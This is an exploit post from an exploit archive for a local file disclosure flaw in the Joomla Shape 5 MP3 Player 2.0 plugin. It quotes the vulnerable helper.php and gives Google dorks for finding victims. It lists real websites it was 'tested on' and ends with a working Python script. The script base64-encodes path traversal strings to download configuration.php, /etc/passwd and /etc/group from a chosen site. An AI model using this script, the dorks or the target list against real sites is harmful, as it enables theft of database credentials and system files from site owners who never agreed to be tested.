Joomla Shape 5 MP3 Player 2.0 Local File Disclosure



EKU-ID: 5296 CVE: OSVDB-ID:
Author: KnocKout Published: 2015-12-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \  
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____ 
                       /_______  //_______  / \______  /
                               \/         \/         \/           
Joomla <= (Shape 5 MP3 Player 2.0) Local File Disclosure Exploit 
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Skype : knockoutr@msn.com
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Greetz :  b3mb4m, ZoRLu, KedAns-Dz ( milw00rm.com )
===================================================================
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Joomla 
|~Plugin : Shape 5 MP3 Player 2.0
|~Affected Version : 2.0
|~Software  : http://extensions.joomla.org/extension/shape-5-mp3-player
|~RISK : High
|~Google Dork :  inurl:"php?fileUrl=" site:ru
|~Google Dork :  inurl:plugins/content/s5_media_player
===================================================================
======================Info=========================================
helper.php unconsciously encoded.
This is a very simple security measures, It was exposed to attack.
if base64 encrypting the file names
'fileurl'  function is used, and local files will be easily exposed.
============ Error line's in helper.php ===========================
<?php
$path = base64_decode($_REQUEST['fileurl']);
$base = basename($path);
$path1 = str_replace(' ','%20',$path);

header('Content-Description: File Transfer');
header('Content-Type:application/octet-stream');
header('Content-Transfer-Encoding: Binary');
header("Content-disposition: attachment; filename=\"".basename($path)."\"");
header('Content-Length: ' . filesize($path));
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
readfile($path1);
exit;
?>
======================================================================
======================== Tested on Demos  ============================
www.kraskinotv.ru
www.alexandra-pavlyuk.ru
www.kovspas.ru
www.asetkz.ru
www.cciheredia.cr
www.helicopterspray.com
www.kpu-karawang.go.id
www.practicalbioethics.org
www.iccfoundation.us
www.mixticius.net
www.stbarnabasdulwich.org
www.ahavathachim.com
www.dcbaptist.org
www.stjohnmansfield.org
www.ilyda.com
www.mountainviewchapel.com
www.biamd.org
www.lavingtonunited.org
www.cypressbible.org
www.brianmcgilloway.com
www.toneside.com
..
etc
..
=======================================================================
================ usage: python h4.py www.site.com  ====================

import base64
import sys
import urllib


def exploit():
	while True:
		print """
[1] = configuration.php
[2] = Try Read /etc/passwd
[3] = Try Read /etc/group
		"""
		command = raw_input("h4 Console# ")
		if command == "1":
			command = base64.b64encode("../../../configuration.php")
		elif command == "2":
			command = base64.b64encode("../../../../../../../../../etc/passwd")
		elif command == "3":
			command = base64.b64encode("../../../../../../../../../etc/group")
		else:
			command = base64.b64encode(command)

		url = "http://%s/plugins/content/s5_media_player/helper.php?fileurl=%s"  % (sys.argv[1],command)

		try:
			test = urllib.urlopen(url)
			if len(test.read()) <= 0:
				print "Exploit failed .."
			else:
				urllib.urlretrieve(url, command)
				#wget.download(url)
				print "Exploit success ! "
		except Exception as e:
			print "Unexpected error : %s " % e




if __name__ == '__main__':
	if len(sys.argv) > 2:
		print "Error usage : python exploit.py website.com"
	else:
		exploit()